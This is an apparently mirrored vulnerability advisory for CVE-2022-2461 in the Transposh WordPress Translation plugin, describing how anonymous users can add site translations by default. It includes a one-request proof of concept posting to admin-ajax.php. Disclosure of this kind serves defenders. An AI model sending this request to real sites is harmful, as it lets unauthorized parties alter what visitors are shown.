Vulners
Lucene search
Transposh WordPress Translation 1.0.7 Incorrect Authorization Vulnerability
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | Transposh WordPress Translation 1.0.7 Cross Site Scripting Vulnerability | 31 Jul 202200:00 | – | zdt |
 | Exploit for Cross-site Scripting in Astaro Security_Gateway_Software | 30 Apr 201915:15 | – | githubexploit |
 | CVE-2022-2536 | 15 Dec 202219:15 | – | attackerkb |
| CVE-2022-2461 | 6 Sep 202218:15 | – | attackerkb |
 | CVE-2022-2461 | 16 Sep 202505:39 | – | circl |
 | WordPress plugin Transposh WordPress Translation 安全漏洞 | 29 Jul 202200:00 | – | cnnvd |
 | CVE-2022-2461 | 6 Sep 202217:18 | – | cve |
 | CVE-2022-2461 Transposh WordPress Translation <= 1.0.9.6 - Unauthorized Settings Change | 6 Sep 202217:18 | – | cvelist |
 | EUVD-2022-34722 | 7 Sep 202200:01 | – | euvd |
 | Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change | 4 Jun 202603:48 | – | nuclei |
10
1. ADVISORY INFORMATION
=======================
Product: Transposh WordPress Translation
Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/
Type: Incorrect Authorization [CWE-863]
Date found: 2022-07-13
Date published: 2022-07-22
CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
CVE: CVE-2022-2461
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Transposh WordPress Translation 1.0.8.1 and below
4. INTRODUCTION
===============
Transposh translation filter for WordPress offers a unique approach to blog
translation. It allows your blog to combine automatic translation with human
translation aided by your users with an easy to use in-context interface.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
When installed Transposh comes with a set of pre-configured options, one of these
is the "Who can translate" setting under the "Settings" tab, which by default
allows "Anonymous" users to add translations via the plugin's "tp_translation"
ajax action.
Successful exploits can allow an unauthenticated attacker to add translations to
the WordPress site and thereby influence what is actually shown on the site.
6. PROOF OF CONCEPT
===================
The following Proof-of-Concept adds a new translation
POST /wp-admin/admin-ajax.php HTTP/2
Host: [host]
Content-Length: 75
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
action=tp_translation&ln0=en&sr0=rcesecurity.com&items=1&tk0=rcesecurity.com&tr0=rcesecurity.com
7. SOLUTION
===========
None. Remove the plugin to prevent exploitation.
8. REPORT TIMELINE
==================
2022-07-13: Discovery of the vulnerability
2022-07-13: CVE requested from WPScan (CNA)
2022-07-18: No response from WPScan
2022-07-18: CVE requested from Wordfence (CNA) instead
2022-07-18: Sent note to vendor
2022-07-18: Wordfence assigns CVE-2022-2461
2022-07-20: Since there are currently no plans to provide fixes at all:
2022-07-22: Public disclosure
9. REFERENCES
=============
https://github.com/MrTuxracer/advisories
https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Jul 2022 00:00Current
0.4Low risk
Vulners AI Score0.4
CVSS 3.15.3
EPSS0.16923
SSVC